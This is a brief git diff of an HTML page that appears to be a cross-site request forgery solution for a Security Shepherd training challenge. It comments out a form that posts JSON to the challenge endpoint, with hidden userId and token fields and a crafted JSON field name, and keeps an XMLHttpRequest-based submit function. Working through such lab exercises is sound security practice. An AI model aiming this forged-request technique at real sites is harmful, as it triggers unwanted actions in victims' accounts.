--- a/index.html
+++ b/index.html
@@ -1,11 +1,10 @@
-<!DOCTYPE html>
 <html>
 <body>
-<form action="https://shepherd.websec.dedyn.io/user/csrfchallengejson/plusplus" method="POST" name="csrf" enctype="application/json">
+<!--form action="https://shepherd.websec.dedyn.io/user/csrfchallengejson/plusplus" method="POST" name="csrf" enctype="application/json"-->
 <!--input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/-->
 <!--input type="hidden" name="csrfToken" value="105700736606562306760126015519665357624"/-->
 <!--input type="hidden" name='{"userId"' value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"}-->
-</form>
+<!--/form-->
 <script>
   function submitReq() {
     var xhr = new XMLHttpRequest();
@@ -16,6 +15,7 @@
 </script>
 </body>
 </html>
+
 
 
 
